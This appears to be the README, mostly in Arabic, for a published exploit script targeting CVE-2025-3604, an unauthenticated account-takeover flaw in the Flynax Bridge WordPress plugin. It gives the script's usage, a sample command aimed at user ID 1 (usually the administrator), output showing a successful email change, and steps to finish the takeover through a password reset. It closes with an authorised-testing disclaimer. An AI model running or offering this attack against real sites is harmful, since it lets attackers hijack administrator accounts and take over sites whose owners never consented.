
Flynax Bridge <= 2.2.0 - تصعيد صلاحيات غير مصادق عليه عبر الاستيلاء على الحساب
إن إضافة Flynax Bridge لووردبريس معرضة لـ تصعيد الصلاحيات عبر الاستيلاء على الحساب في جميع الإصدارات حتى 2.2.0.
وذلك بسبب عدم قيام الإضافة بالتحقق بشكل صحيح من هوية المستخدم قبل تحديث تفاصيل حسابه (مثل البريد الإلكتروني). ونتيجة لذلك، يمكن للمهاجمين غير المصادق عليهم تغيير عنوان البريد الإلكتروني لأي مستخدم، بما في ذلك المسؤولين، ثم بدء إعادة تعيين كلمة المرور للاستيلاء الكامل على الحساب.
CVE: CVE-2025-3604
CVSS: 9.8 (حرج)
تاريخ النشر: 23 أبريل 2025
آخر تحديث: 24 أبريل 2025
Detected plugin version: 2.2.0
Version is vulnerable. Attempting exploit...
Exploit succeeded! Email changed to: [email protected]
Exploit By Nxploited (Khaled_alenazi) | https://github.com/Nxploited
بعد نجاح الاستغلال، يمكن للمهاجم الذهاب إلى صفحة تسجيل الدخول لووردبريس والنقر على "هل نسيت كلمة المرور؟" باستخدام البريد الإلكتروني الجديد لإعادة تعيين كلمة المرور والحصول على وصول كامل إلى الحساب المستهدف.
usage: CVE-2025-3604.py [-h] -u URL [-mail NEWMAIL] -id USER_ID
WordPress Flynax Bridge Unauthenticated Privilege Escalation via Account # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target URL
-mail, --newmail NEWMAIL
New email to set
-id, --user_id USER_ID User ID to exploit
python3 CVE-2025-3604.py -u "http://TARGET/wordpress/" -id "1" -mail "[email protected]"
-u: عنوان URL الأساسي لموقع ووردبريس.-id: معرف المستخدم المستهدف (عادةً 1 للمسؤول).-mail: البريد الإلكتروني الجديد الذي سيتم تعيينه لهذا المستخدم.الاستخدام على مسؤوليتك الشخصية. لأغراض الاختبار المصرح به والتعليم فقط.
بواسطة: Nxploited ( Khaled_alenazi )